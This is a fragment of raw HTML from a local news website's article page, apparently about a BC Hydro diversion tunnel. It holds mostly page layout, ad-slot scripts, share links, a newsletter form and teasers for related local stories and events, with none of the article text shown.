</div></center></div><div class="td_block_wrap td_block_title td_uid_22_5d28fc08cd41e_rand td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_22_5d28fc08cd41e"><h1 class="block-title td-block-title"><span class="td-pulldown-size">Author</span></h1><div class="td_mod_wrap"></div></div><div class="tdb-author-box td_block_wrap tdb_single_author_box td_uid_23_5d28fc08cd863_rand tdb-content-vert-top td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_23_5d28fc08cd863">
<style>
/* custom css */
.td_uid_23_5d28fc08cd863_rand {
                    padding: 21px;
                }
                
                .td_uid_23_5d28fc08cd863_rand {
                    border: 1px solid #ededed;
                }
                
                
                
                
                .td_uid_23_5d28fc08cd863_rand .tdb-author-photo {
                    width: 96px;
                }
                
                @media (min-width: 767px) {
                    .td_uid_23_5d28fc08cd863_rand .tdb-author-photo {
                        padding-right: 21px;
                    }
                }
                @media (max-width: 767px) {
                    .td_uid_23_5d28fc08cd863_rand .tdb-author-photo {
                        margin-bottom: 21px;
                    }
                }
                
                
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i {
					font-size: 15px;
					vertical-align: middle;
				}
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i.td-icon-twitter,
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i.td-icon-linkedin,
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i.td-icon-pinterest,
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i.td-icon-blogger,
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i.td-icon-vimeo {
					font-size: 12px;
				}
				
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item {
					min-width: 15px;
					height: 15px;
				}
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item i {
					line-height: 15px;
				}
				
				.td_uid_23_5d28fc08cd863_rand .tdb-social-item {
				    margin: 7px 14px 7px 0;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.td_uid_23_5d28fc08cd863_rand {
                    border: 1px solid #ededed;
                }
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.td_uid_23_5d28fc08cd863_rand {
                    border: 1px solid #ededed;
                }
}

/* phone */
@media (max-width: 767px){
.td_uid_23_5d28fc08cd863_rand {
                    border: 1px solid #ededed;
                }
                
                
                
                
                @media (min-width: 767px) {
                    .td_uid_23_5d28fc08cd863_rand .tdb-author-photo {
                        padding-right: 10px;
                    }
                }
                @media (max-width: 767px) {
                    .td_uid_23_5d28fc08cd863_rand .tdb-author-photo {
                        margin-bottom: 10px;
                    }
                }
}
</style><div class="tdb-block-inner td-fix-index"><a href="https://www.energeticcity.ca/author/tteves/" class="tdb-author-photo"><img src="https://i1.wp.com/www.energeticcity.ca/wp-content/wphb-cache/gravatar/2e3/2e3f3146babeaa0599c8f3306700b9e0x96.jpg?resize=96%2C96&#038;ssl=1" width="96" height="96" alt="Avatar" class="avatar avatar-96 wp-user-avatar wp-user-avatar-96 photo avatar-default" data-recalc-dims="1" /></a><div class="tdb-author-info"><a href="https://www.energeticcity.ca/author/tteves/" class="tdb-author-name">Tracy Teves</a><a href="https://www.energeticcity.ca" class="tdb-author-url">https://www.energeticcity.ca</a><div class="tdb-author-descr"></div><div class="tdb-author-social"><a href="https://www.facebook.com/energeticcity" target="_blank" title="facebook" class="tdb-social-item"><i class="td-icon-font td-icon-facebook"></i></a><a href="https://twitter.com/energeticcity" target="_blank" title="twitter" class="tdb-social-item"><i class="td-icon-font td-icon-twitter"></i></a></div></div></div></div><div class="wpb_wrapper td_block_wrap vc_raw_html td_uid_24_5d28fc08ce229_rand "><div class="td-fix-index"><div class="OUTBRAIN" data-widget-id="TF_5" data-src=" " data-ob-template="EnergeticCity.ca"></div></div></div><div class="td-a-rec td-a-rec-id-custom_ad_6  td_uid_28_5d28fc08ce97e_rand td_block_template_1">
<style>

/* inline tdc_css att */

/* desktop */ @media(min-width: 1141px) { .td_uid_28_5d28fc08ce97e_rand { 
display:none !important;
} }

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.td_uid_28_5d28fc08ce97e_rand{
display:none !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.td_uid_28_5d28fc08ce97e_rand{
display:none !important;
}
}

</style><center>
<div id='div-gpt-ad-1542420378205-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1542420378205-0'); });
</script>
</div></center></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator td_uid_29_5d28fc08cec66_rand  td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.td_uid_29_5d28fc08cec66_rand{
margin-top:28px !important;
margin-bottom:20px !important;
}

</style></div><div class="td_block_wrap tdb_single_post_share td_uid_30_5d28fc08ced00_rand td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_30_5d28fc08ced00"><div id="td_uid_30_5d28fc08ced00" class="td-post-sharing td-ps-dark-bg td-ps-padding td-post-sharing-style15 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F">
<div class="td-social-but-icon"><i class="td-icon-facebook"></i></div>
<div class="td-social-but-text">Facebook</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=BC+Hydro+makes+breakthrough+on+second+diversion+tunnel&url=https%3A%2F%2Fwww.energeticcity.ca%2F2019%2F07%2Fbc-hydro-makes-breakthrough-on-second-diversion-tunnel%2F&via=energeticcity">
<div class="td-social-but-icon"><i class="td-icon-twitter"></i></div>
<div class="td-social-but-text">Twitter</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" href="/cdn-cgi/l/email-protection#a09fd3d5c2cac5c3d49de2e380e8d9c4d2cf80cdc1cbc5d380c2d2c5c1cbd4c8d2cfd5c7c880cfce80d3c5c3cfcec480c4c9d6c5d2d3c9cfce80d4d5cecec5cc86c2cfc4d99dc8d4d4d0d39a8f8fd7d7d78ec5cec5d2c7c5d4c9c3c3c9d4d98ec3c18f929091998f90978fc2c38dc8d9c4d2cf8dcdc1cbc5d38dc2d2c5c1cbd4c8d2cfd5c7c88dcfce8dd3c5c3cfcec48dc4c9d6c5d2d3c9cfce8dd4d5cecec5cc8f">
<div class="td-social-but-icon"><i class="td-icon-mail"></i></div>
<div class="td-social-but-text">Email</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/&amp;media=https://www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png&description=BC+Hydro+makes+breakthrough+on+second+diversion+tunnel">
<div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div>
<div class="td-social-but-text">Pinterest</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="whatsapp://send?text=BC Hydro makes breakthrough on second diversion tunnel %0A%0A https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/">
<div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div>
<div class="td-social-but-text">WhatsApp</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-googleplus" href="https://plus.google.com/share?url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/">
<div class="td-social-but-icon"><i class="td-icon-googleplus"></i></div>
 <div class="td-social-but-text">Google+</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/&title=BC Hydro makes breakthrough on second diversion tunnel">
<div class="td-social-but-icon"><i class="td-icon-linkedin"></i></div>
<div class="td-social-but-text">Linkedin</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#">
<div class="td-social-but-icon"><i class="td-icon-print"></i></div>
<div class="td-social-but-text">Print</div>
</a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_uid_30_5d28fc08ced00">
<div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
</a></div></div></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator td_uid_31_5d28fc08cf7df_rand  td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.td_uid_31_5d28fc08cf7df_rand{
margin-bottom:30px !important;
}

/* phone */
@media (max-width: 767px)
{
.td_uid_31_5d28fc08cf7df_rand{
margin-top:-7px !important;
}
}

</style></div><div class="td_block_wrap tdb_single_next_prev td_uid_32_5d28fc08cf9c7_rand td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_32_5d28fc08cf9c7">
<style>

/* inline tdc_css att */

.td_uid_32_5d28fc08cf9c7_rand{
margin-bottom:43px !important;
}

</style>
<style>
/* custom css */
.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post span {
					color: #666666;
				}
				
				.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post a {
					font-family:Montserrat !important;font-size:18px !important;line-height:1.3 !important;font-weight:700 !important;
				}
				
				.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post span {
					font-family:Open Sans !important;font-size:16px !important;font-weight:300 !important;text-transform:uppercase !important;
				}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post a {
					font-family:Montserrat !important;font-size:14px !important;line-height:1.3 !important;font-weight:700 !important;
				}
}

/* phone */
@media (max-width: 767px){
.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post a {
					font-family:Montserrat !important;font-size:13px !important;line-height:1.3 !important;font-weight:600 !important;
				}
				
				.td_uid_32_5d28fc08cf9c7_rand .tdb-next-post span {
					font-family:Open Sans !important;font-size:14px !important;font-weight:300 !important;text-transform:uppercase !important;
				}
}
</style><div class="tdb-block-inner td-fix-index"><div class="tdb-next-post tdb-next-post-bg tdb-post-prev"><span>Previous article</span><a href="https://www.energeticcity.ca/2019/07/vandalism-at-city-parks-creates-a-no-win-situation/">Vandalism at City Parks creates a no win situation</a></div><div class="tdb-next-post tdb-next-post-bg tdb-post-next"><span>Next article</span><a href="https://www.energeticcity.ca/2019/07/grande-prairie-rcmp-to-set-up-mobile-breath-test-unit-this-weekend/">Grande Prairie RCMP to set up Mobile Breath Test Unit this weekend</a></div></div></div><div class="td_block_wrap tdb_single_related td_uid_33_5d28fc08d14d8_rand td_with_ajax_pagination td-pb-border-top td_block_template_1 tdb-single-related-posts" data-td-block-uid="td_uid_33_5d28fc08d14d8">
<style>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</style><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>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</script><div class="td-block-title-wrap"><h4 class="block-title"><span>RECENT STORIES</span></h4></div><div id=td_uid_33_5d28fc08d14d8 class="td_block_inner tdb-block-inner td-fix-index">
<div class="tdb_module_related td_module_wrap td-animation-stack">
<div class="td-module-container td-category-pos-image">
<div class="td-image-container">
<a href="https://www.energeticcity.ca/news/" class="td-post-category">News</a> <div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/bc-government-allocates-more-funding-for-wildfire-risk-reduction-projects/" rel="bookmark" class="td-image-wrap" title="BC Government allocates more funding for wildfire risk reduction projects"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i1.wp.com/www.energeticcity.ca/wp-content/uploads/2018/08/7312018_11627_IMG_1469.jpg?resize=696%2C392&ssl=1"></span></a></div> </div>
<div class="td-module-meta-info">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/bc-government-allocates-more-funding-for-wildfire-risk-reduction-projects/" rel="bookmark" title="BC Government allocates more funding for wildfire risk reduction projects">BC Government allocates more funding for wildfire risk reduction projects</a></h3>
<div class="td-editor-date">
<span class="td-author-date">
<span class="td-post-author-name"><a href="https://www.energeticcity.ca/author/sbrooks/">Scott Brooks</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T14:02:23+00:00">July 12, 2019 2:02 pm</time></span> </span>
</div>
<div class="td-excerpt">PRINCE GEORGE, B.C. - The Government of British Columbia has allocated another $574,840 in Community Resiliency Investment program grants...</div>
<div class="td-read-more">
<a href="https://www.energeticcity.ca/2019/07/bc-government-allocates-more-funding-for-wildfire-risk-reduction-projects/">Read more</a>
</div>
</div>
</div>
</div>
<div class="tdb_module_related td_module_wrap td-animation-stack">
<div class="td-module-container td-category-pos-image">
<div class="td-image-container">
<a href="https://www.energeticcity.ca/news/" class="td-post-category">News</a> <div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/grande-prairie-rcmp-to-set-up-mobile-breath-test-unit-this-weekend/" rel="bookmark" class="td-image-wrap" title="Grande Prairie RCMP to set up Mobile Breath Test Unit this weekend"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/20190712-Breath-Test-Unit-e1562962240794.jpg?resize=696%2C928&ssl=1"></span></a></div> </div>
<div class="td-module-meta-info">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/grande-prairie-rcmp-to-set-up-mobile-breath-test-unit-this-weekend/" rel="bookmark" title="Grande Prairie RCMP to set up Mobile Breath Test Unit this weekend">Grande Prairie RCMP to set up Mobile Breath Test Unit this weekend</a></h3>
<div class="td-editor-date">
<span class="td-author-date">
<span class="td-post-author-name"><a href="https://www.energeticcity.ca/author/sbrooks/">Scott Brooks</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T13:13:25+00:00">July 12, 2019 1:13 pm</time></span> </span>
</div>
<div class="td-excerpt">GRANDE PRAIRIE, A.B. - This weekend, July 12 to the 14, Grande Prairie RCMP Traffic Unit, along with Integrated...</div>
<div class="td-read-more">
<a href="https://www.energeticcity.ca/2019/07/grande-prairie-rcmp-to-set-up-mobile-breath-test-unit-this-weekend/">Read more</a>
</div>
</div>
</div>
</div>
<div class="tdb_module_related td_module_wrap td-animation-stack">
<div class="td-module-container td-category-pos-image">
<div class="td-image-container">
<a href="https://www.energeticcity.ca/news/" class="td-post-category">News</a> <div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/vandalism-at-city-parks-creates-a-no-win-situation/" rel="bookmark" class="td-image-wrap" title="Vandalism at City Parks creates a no win situation"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://i1.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/Spray-park-Vandalism.jpg?resize=696%2C928&ssl=1"></span></a></div> </div>
<div class="td-module-meta-info">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/vandalism-at-city-parks-creates-a-no-win-situation/" rel="bookmark" title="Vandalism at City Parks creates a no win situation">Vandalism at City Parks creates a no win situation</a></h3>
<div class="td-editor-date">
<span class="td-author-date">
<span class="td-post-author-name"><a href="https://www.energeticcity.ca/author/tteves/">Tracy Teves</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T12:23:44+00:00">July 12, 2019 12:23 pm</time></span> </span>
</div>
<div class="td-excerpt">FORT ST. JOHN, B.C. - With recent vandalism at the city&#039;s Toboggan Hill and Spray park the disappointing truth...</div>
<div class="td-read-more">
<a href="https://www.energeticcity.ca/2019/07/vandalism-at-city-parks-creates-a-no-win-situation/">Read more</a>
</div>
</div>
</div>
</div>
</div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_33_5d28fc08d14d8" data-td_block_id="td_uid_33_5d28fc08d14d8"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_33_5d28fc08d14d8" data-td_block_id="td_uid_33_5d28fc08d14d8"><i class="td-icon-font td-icon-menu-right"></i></a></div></div></div></div><div class="vc_column td_uid_34_5d28fc0928d23_rand  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.td_uid_34_5d28fc0928d23_rand{
display:none !important;
}
}

</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_wrap vc_widget_sidebar td_uid_35_5d28fc0928f22_rand "><div class="td-a-rec td-a-rec-id-custom_ad_1  td-rec-hide-on-p td_uid_36_5d28fc092917a_rand td_block_template_1"><span class="td-adspot-title">Advertisement</span><center>
<div id='div-gpt-ad-1542379461361-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1542379461361-0'); });
</script>
</div></center></div><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><center>Advertisement</center><center>
<div id='div-gpt-ad-1546012712555-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1546012712555-0'); });
</script>
</div></center> </div></aside><aside class="td_block_template_1 widget widget_mc4wp_form_widget"><h4 class="block-title"><span>Join our daily newsletter</span></h4><script>(function() {
	if (!window.mc4wp) {
		window.mc4wp = {
			listeners: [],
			forms    : {
				on: function (event, callback) {
					window.mc4wp.listeners.push({
						event   : event,
						callback: callback
					});
				}
			}
		}
	}
})();
</script><form id="mc4wp-form-2" class="mc4wp-form mc4wp-form-89505" method="post" data-id="89505" data-name="Energeticcity.ca Mailout"><div class="mc4wp-form-fields"><div class="newsletter-block">
<p>Sign up for the daily Energeticcity.ca email sponsored by the <a href="https://www.blackdiamondgroup.com/"> Black Diamond Group</a>. Get the latest news sent directly to your inbox.</p>
<p>
<label>Email address: </label>
<input type="email" name="EMAIL" placeholder="Your email address" required />
</p>
<p>
<input type="submit" value="Subscribe" />
</p>
</div>
</div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1562967049" /><input type="hidden" name="_mc4wp_form_id" value="89505" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-2" /><div class="mc4wp-response"></div></form></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget">
<div id='div-gpt-ad-1548958187631-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958187631-0'); });
</script>
</div></div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget">
<div id='div-gpt-ad-1548958200546-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958200546-0'); });
</script>
</div></div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget">
<center><div id='div-gpt-ad-1548958217123-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958217123-0'); });
</script>
</div></center></div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><center>Advertisement</center><center>
<div id='div-gpt-ad-1548958254077-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958254077-0'); });
</script>
</div></center></div></aside><div class="td_block_wrap td_block_16 td_block_widget td_uid_37_5d28fc0929df4_rand td-pb-border-top td_block_template_1 td-column-1 td_block_padding" data-td-block-uid="td_uid_37_5d28fc0929df4"><script>var block_td_uid_37_5d28fc0929df4 = new tdBlock();
block_td_uid_37_5d28fc0929df4.id = "td_uid_37_5d28fc0929df4";
block_td_uid_37_5d28fc0929df4.atts = '{"custom_title":"Local Events","custom_url":"","block_template_id":"","header_color":"#","header_text_color":"#","mx7_tl":"","mx7_el":"","m6_tl":"","limit":"4","offset":"","el_class":"","post_ids":"","category_id":"2697","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","sort":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","ajax_pagination":"","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_37_5d28fc0929df4_rand","separator":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","mx7f_title_font_header":"","mx7f_title_font_title":"Article title","mx7f_title_font_settings":"","mx7f_title_font_family":"","mx7f_title_font_size":"","mx7f_title_font_line_height":"","mx7f_title_font_style":"","mx7f_title_font_weight":"","mx7f_title_font_transform":"","mx7f_title_font_spacing":"","mx7f_title_":"","mx7f_cat_font_title":"Article category tag","mx7f_cat_font_settings":"","mx7f_cat_font_family":"","mx7f_cat_font_size":"","mx7f_cat_font_line_height":"","mx7f_cat_font_style":"","mx7f_cat_font_weight":"","mx7f_cat_font_transform":"","mx7f_cat_font_spacing":"","mx7f_cat_":"","mx7f_meta_font_title":"Article meta info","mx7f_meta_font_settings":"","mx7f_meta_font_family":"","mx7f_meta_font_size":"","mx7f_meta_font_line_height":"","mx7f_meta_font_style":"","mx7f_meta_font_weight":"","mx7f_meta_font_transform":"","mx7f_meta_font_spacing":"","mx7f_meta_":"","mx7f_ex_font_title":"Article excerpt","mx7f_ex_font_settings":"","mx7f_ex_font_family":"","mx7f_ex_font_size":"","mx7f_ex_font_line_height":"","mx7f_ex_font_style":"","mx7f_ex_font_weight":"","mx7f_ex_font_transform":"","mx7f_ex_font_spacing":"","mx7f_ex_":"","m6f_title_font_header":"","m6f_title_font_title":"Article title","m6f_title_font_settings":"","m6f_title_font_family":"","m6f_title_font_size":"","m6f_title_font_line_height":"","m6f_title_font_style":"","m6f_title_font_weight":"","m6f_title_font_transform":"","m6f_title_font_spacing":"","m6f_title_":"","m6f_cat_font_title":"Article category tag","m6f_cat_font_settings":"","m6f_cat_font_family":"","m6f_cat_font_size":"","m6f_cat_font_line_height":"","m6f_cat_font_style":"","m6f_cat_font_weight":"","m6f_cat_font_transform":"","m6f_cat_font_spacing":"","m6f_cat_":"","m6f_meta_font_title":"Article meta info","m6f_meta_font_settings":"","m6f_meta_font_family":"","m6f_meta_font_size":"","m6f_meta_font_line_height":"","m6f_meta_font_style":"","m6f_meta_font_weight":"","m6f_meta_font_transform":"","m6f_meta_font_spacing":"","m6f_meta_":"","css":"","tdc_css":"","td_column_number":1,"color_preset":"","border_top":"","tdc_css_class":"td_uid_37_5d28fc0929df4_rand","tdc_css_class_style":"td_uid_37_5d28fc0929df4_rand_style"}';
block_td_uid_37_5d28fc0929df4.td_column_number = "1";
block_td_uid_37_5d28fc0929df4.block_type = "td_block_16";
block_td_uid_37_5d28fc0929df4.post_count = "4";
block_td_uid_37_5d28fc0929df4.found_posts = "60";
block_td_uid_37_5d28fc0929df4.header_color = "#";
block_td_uid_37_5d28fc0929df4.ajax_pagination_infinite_stop = "";
block_td_uid_37_5d28fc0929df4.max_num_pages = "15";
tdBlocksArray.push(block_td_uid_37_5d28fc0929df4);
</script><div class="td-block-title-wrap"><h4 class="block-title td-block-title"><span class="td-pulldown-size">Local Events</span></h4></div><div id=td_uid_37_5d28fc0929df4 class="td_block_inner td-column-1">
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/06/country-group-rascal-flatts-heading-to-dawson-creek/" rel="bookmark" class="td-image-wrap" title="Country group Rascal Flatts heading to Dawson Creek"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="Country group Rascal Flatts heading to Dawson Creek" data-type="image_tag" data-img-url="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2019/06/RF.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/06/country-group-rascal-flatts-heading-to-dawson-creek/" rel="bookmark" title="Country group Rascal Flatts heading to Dawson Creek">Country group Rascal Flatts heading to Dawson Creek</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-06-18T07:45:26+00:00">June 18, 2019 7:45 am</time></span> </div>
</div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/06/daddy-daughter-princess-ball-tickets-on-sale-today-at-10-a-m/" rel="bookmark" class="td-image-wrap" title="Daddy Daughter Princess Ball &#8211; Tickets on sale today at 10 a.m."><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="Daddy Daughter Princess Ball &#8211; Tickets on sale today at 10 a.m." data-type="image_tag" data-img-url="https://i2.wp.com/www.energeticcity.ca/wp-content/uploads/2019/06/Princess-ball-enc.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/06/daddy-daughter-princess-ball-tickets-on-sale-today-at-10-a-m/" rel="bookmark" title="Daddy Daughter Princess Ball &#8211; Tickets on sale today at 10 a.m.">Daddy Daughter Princess Ball &#8211; Tickets on sale today at 10...</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-06-14T06:04:52+00:00">June 14, 2019 6:04 am</time></span> </div>
</div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/05/learn-the-fundamentals-of-social-media-or-become-a-social-media-master/" rel="bookmark" class="td-image-wrap" title="Learn the fundamentals of Social Media or become a Social Media Master"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="Learn the fundamentals of Social Media or become a Social Media Master" data-type="image_tag" data-img-url="https://i1.wp.com/www.energeticcity.ca/wp-content/uploads/2019/05/Social-Media-Classes-ENCTickets-revised.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/05/learn-the-fundamentals-of-social-media-or-become-a-social-media-master/" rel="bookmark" title="Learn the fundamentals of Social Media or become a Social Media Master">Learn the fundamentals of Social Media or become a Social Media...</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-17T10:33:53+00:00">May 17, 2019 10:33 am</time></span> </div>
</div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/04/vip-manny-blu-lunch-show-for-the-fort-st-john-salvation-army-food-bank/" rel="bookmark" class="td-image-wrap" title="VIP Manny Blu Lunch Show for the Fort St. John Salvation Army Food Bank"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="VIP Manny Blu Lunch Show for the Fort St. John Salvation Army Food Bank" data-type="image_tag" data-img-url="https://i1.wp.com/www.energeticcity.ca/wp-content/uploads/2019/04/Manny-Web-1920x1080.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/04/vip-manny-blu-lunch-show-for-the-fort-st-john-salvation-army-food-bank/" rel="bookmark" title="VIP Manny Blu Lunch Show for the Fort St. John Salvation Army Food Bank">VIP Manny Blu Lunch Show for the Fort St. John Salvation...</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-04-23T18:00:26+00:00">April 23, 2019 6:00 pm</time></span> </div>
</div>
</div>
</div> </div></div> <aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><center>Advertisement</center><center>
<div id='div-gpt-ad-1548958270663-0' style='height:250px; width:300px;'>
<script>
